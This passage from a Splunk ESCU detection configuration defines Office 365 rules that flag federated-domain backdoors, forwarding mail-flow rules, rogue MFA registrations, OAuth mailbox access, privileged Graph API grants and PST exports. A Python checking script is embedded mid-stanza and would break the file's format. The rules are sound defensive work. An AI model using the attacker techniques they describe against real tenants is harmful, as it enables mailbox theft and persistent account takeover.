action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on. This search works with o365:management:activity.
action.escu.known_false_positives = The creation of a new federated domain is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a similar or different cloud provider.
action.escu.creation_date = 2023-08-02
action.escu.modification_date = 2023-08-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 New Federated Domain Added - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = User $user$ has added a new federated domain $new_value$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 New Federated Domain Added - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach.
action.notable.param.rule_title = O365 New Federated Domain Added
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Operation IN ("*add*", "*new*") AND Operation="*domain*" | stats count min(_time) as firstTime max(_time) as lastTime values(ModifiedProperties{}.NewValue) as new_value by user user_agent authentication_service action Workload Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`

[ESCU - O365 New Forwarding Mailflow Rule Created - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Forwarding mail flow rules may be created for legitimate reasons. Filter as needed.
action.escu.creation_date = 2024-04-10
action.escu.modification_date = 2024-04-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 New Forwarding Mailflow Rule Created - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques"]
action.risk = 1
action.risk.param._risk_message = A new forwarding mailflow rule was created by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 New Forwarding Mailflow Rule Created - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic monitors for the creation of new mail flow rules in Office 365 that could potentially redirect or copy emails to unauthorized or external addresses. This analytic works by querying the Office 365 Management Activity logs for any operation tagged as "New-TransportRule". It specifically looks for parameters indicative of mail forwarding actions, such as "BlindCopyTo", "CopyTo", and "RedirectMessageTo". If any of these parameters are present, indicating that a forwarding rule has been set up, the detection then captures the details of this rule, including the user ID responsible for the creation, the name of the rule, the forwarding target, and the timestamps of the rule's creation and last modification.
action.notable.param.rule_title = O365 New Forwarding Mailflow Rule Created
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation="New-TransportRule" | eval match1=mvfind('Parameters{}.Name', "BlindCopyTo") | eval match2=mvfind('Parameters{}.Name', "CopyTo") | eval match3=mvfind('Parameters{}.Name', "RedirectMessageTo") | where match1>= 0 OR match2>= 0 OR match3>=0 | eval ForwardTo=coalesce(BlindCopyTo, CopyTo, RedirectMessageTo) | search ForwardTo!="" | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, Name, ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_forwarding_mailflow_rule_created_filter`

[ESCU - O365 New MFA Method Registered - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Users may register MFA methods legitimately, investigate and filter as needed.
action.escu.creation_date = 2023-10-20
action.escu.modification_date = 2023-10-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 New MFA Method Registered - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms"]
action.risk = 1
action.risk.param._risk_message = A new MFA method was added for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 New MFA Method Registered - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Office 365 by monitoring O365 audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account.
action.notable.param.rule_title = O365 New MFA Method Registered
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update user." | eval propertyName = mvindex('ModifiedProperties{}.Name', 0) | search propertyName = StrongAuthenticationMethod | eval oldvalue = mvindex('ModifiedProperties{}.OldValue',0) | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | rex field=newvalue max_match=0 "(?i)(?<new_method_type>\"MethodType\")" | rex field=oldvalue max_match=0 "(?i)(?<old_method_type>\"MethodType\")" | eval count_new_method_type = coalesce(mvcount(new_method_type), 0) | eval count_old_method_type = coalesce(mvcount(old_method_type), 0) | where count_new_method_type > count_old_method_type | stats earliest(_time) as firstTime latest(_time) as lastTime values(propertyName) by user newvalue oldvalue | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_mfa_method_registered_filter`

[ESCU - O365 OAuth App Mailbox Access via EWS - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = OAuth applications may access mailboxes for legitimate purposes, you can use the src_ip to add trusted sources to an allow list.
action.escu.creation_date = 2024-01-31
action.escu.modification_date = 2024-01-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 OAuth App Mailbox Access via EWS - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = An OAuth application identified with id $ClientAppId$ accessed mailboxes through the Graph API.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 OAuth App Mailbox Access via EWS - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS), as indicated by the ClientInfoString field starting with "Client=WebServices;ExchangeWebServices". It monitors mailbox activities, focusing on OAuth-authenticated applications that interact with EWS. The query aggregates key metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. For defenders, it is critical to keep track of OAuth applications using EWS to access emails, as this information is instrumental in identifying and preventing potential abuse or unauthorized data access.
action.notable.param.rule_title = O365 OAuth App Mailbox Access via EWS
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* ClientAppId=* | regex ClientInfoString="^Client=WebServices;ExchangeWebServices" | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ClientIPAddress) as src_ip by user ClientAppId OperationCount AppId ClientInfoString | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_oauth_app_mailbox_access_via_ews_filter`

[ESCU - O365 OAuth App Mailbox Access via Graph API - Rule]
action.escu = 0
action.escu.enabled = 1
description = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = OAuth applications may access mailboxes for legitimate purposes, you can use the ClientAppId to add trusted applications to an allow list.
action.escu.creation_date = 2024-01-31
action.escu.modification_date = 2024-01-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 OAuth App Mailbox Access via Graph API - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = An OAuth application identified with id $ClientAppId$ accessed mailboxes through the Graph API.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 OAuth App Mailbox Access via Graph API - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns.
action.notable.param.rule_title = O365 OAuth App Mailbox Access via Graph API
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* AppId=00000003-0000-0000-c000-000000000000 | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ClientIPAddress) by user ClientAppId OperationCount AppId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_oauth_app_mailbox_access_via_graph_api_filter`

[ESCU - O365 Privileged Graph API Permission Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications.
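The Entitlement ID check this rule's description outlines, as an added example that is not ESCU code: the RequiredResourceAccess JSON carried in NewValue is flattened along the same `{}.RequiredAppPermissions{}.EntitlementId` path the SPL reads with spath, matched against the three IDs above, and aggregated per user, object and user agent. The sample events, the `required_access` builder, the benign placeholder GUID and the UserAgent field are this example's assumptions; unlike the SPL, which reads only ModifiedProperties index 0, it inspects every modified property.

```python
"""Added example (not ESCU code): the EntitlementId check from the rule described
above, run over constructed 'Update application.' audit events."""
import json

# The three app-role permissions the rule names, with the Entitlement IDs from its description.
PRIVILEGED_ENTITLEMENTS = {
    "1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9": "Application.ReadWrite.All",
    "06b708a9-e830-4db3-a914-8e69da51d44f": "AppRoleAssignment.ReadWrite.All",
    "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8": "RoleManagement.ReadWrite.Directory",
}

# Constructed placeholder for a low-privilege entitlement (not a real Graph permission ID).
BENIGN_ENTITLEMENT = "00000000-0000-0000-0000-00000000beef"


def required_access(*entitlement_ids):
    """Build the RequiredResourceAccess JSON string the audit log carries in NewValue
    (assumed shape: a list of resources, each with a RequiredAppPermissions list)."""
    return json.dumps([{
        "ResourceAppId": "00000003-0000-0000-c000-000000000000",
        "RequiredAppPermissions": [{"EntitlementId": eid, "DirectAccessGrant": True}
                                   for eid in entitlement_ids],
    }])


# Constructed sample events; field names follow o365:management:activity records and
# UserAgent stands in for the user_agent field the Splunk add-on extracts.
SAMPLE_EVENTS = [
    {"Workload": "AzureActiveDirectory", "Operation": "Update application.",
     "UserId": "admin@example.com", "ObjectId": "Application_helpdesk-bot",
     "UserAgent": "Mozilla/5.0 (constructed)",
     "ModifiedProperties": [{"Name": "RequiredResourceAccess",
                             "OldValue": required_access(BENIGN_ENTITLEMENT),
                             "NewValue": required_access(BENIGN_ENTITLEMENT,
                                                         "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8")}]},
    # Only a benign permission: must not match.
    {"Workload": "AzureActiveDirectory", "Operation": "Update application.",
     "UserId": "admin@example.com", "ObjectId": "Application_reporting",
     "UserAgent": "Mozilla/5.0 (constructed)",
     "ModifiedProperties": [{"Name": "RequiredResourceAccess",
                             "OldValue": "[]", "NewValue": required_access(BENIGN_ENTITLEMENT)}]},
    # Two privileged permissions at once, and RequiredResourceAccess is not the first
    # ModifiedProperties entry (the SPL's mvindex(..., 0) would only see DisplayName).
    {"Workload": "AzureActiveDirectory", "Operation": "Update application.",
     "UserId": "svc-deploy@example.com", "ObjectId": "Application_sync-agent",
     "UserAgent": "python-requests (constructed)",
     "ModifiedProperties": [{"Name": "DisplayName", "OldValue": "\"sync\"", "NewValue": "\"sync-agent\""},
                            {"Name": "RequiredResourceAccess", "OldValue": "[]",
                             "NewValue": required_access("1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9",
                                                         "06b708a9-e830-4db3-a914-8e69da51d44f")}]},
    # Unparseable NewValue: must be skipped rather than abort the detection.
    {"Workload": "AzureActiveDirectory", "Operation": "Update application.",
     "UserId": "admin@example.com", "ObjectId": "Application_broken",
     "UserAgent": "Mozilla/5.0 (constructed)",
     "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "", "NewValue": "<truncated>"}]},
]


def entitlement_ids(new_value):
    """Flatten the '{}.RequiredAppPermissions{}.EntitlementId' path the SPL reads via spath."""
    try:
        resources = json.loads(new_value)
    except (TypeError, ValueError):
        return []
    if not isinstance(resources, list):
        return []
    return [perm["EntitlementId"]
            for resource in resources if isinstance(resource, dict)
            for perm in resource.get("RequiredAppPermissions", [])
            if isinstance(perm, dict) and "EntitlementId" in perm]


def detect_privileged_permissions(events):
    """One finding per (user, object, user_agent) with the privileged permission names
    present in the application's new permission set; applications without any are dropped."""
    findings = {}
    for ev in events:
        if ev.get("Workload") != "AzureActiveDirectory" or ev.get("Operation") != "Update application.":
            continue
        granted = set()
        # Generalisation of the SPL, which reads only ModifiedProperties index 0:
        # every modified property is inspected, so ordering cannot hide the grant.
        for prop in ev.get("ModifiedProperties", []):
            for eid in entitlement_ids(prop.get("NewValue")):
                if eid in PRIVILEGED_ENTITLEMENTS:
                    granted.add(PRIVILEGED_ENTITLEMENTS[eid])
        if not granted:
            continue
        key = (ev.get("UserId"), ev.get("ObjectId"), ev.get("UserAgent"))
        entry = findings.setdefault(key, {"count": 0, "permissions": set()})
        entry["count"] += 1
        entry["permissions"] |= granted
    return findings


if __name__ == "__main__":
    for (user, obj, agent), entry in detect_privileged_permissions(SAMPLE_EVENTS).items():
        print(f"{user} assigned {sorted(entry['permissions'])} to {obj} via {agent}")
```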
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Privileged Graph API permissions may be assigned for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-01-30
action.escu.modification_date = 2024-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Privileged Graph API Permission Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = User $user$ assigned privileged Graph API permissions to $object$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Privileged Graph API Permission Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications.
action.notable.param.rule_title = O365 Privileged Graph API Permission Assigned
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application." | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | spath input=newvalue | search "{}.RequiredAppPermissions{}.EntitlementId"="1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9" OR "{}.RequiredAppPermissions{}.EntitlementId"="06b708a9-e830-4db3-a914-8e69da51d44f" OR "{}.RequiredAppPermissions{}.EntitlementId"="9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_privileged_graph_api_permission_assigned_filter`

[ESCU - O365 PST export alert - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on. This search works with o365:management:activity
action.escu.known_false_positives = PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.
action.escu.creation_date = 2020-12-16
action.escu.modification_date = 2020-12-16
action.escu.confidence = high
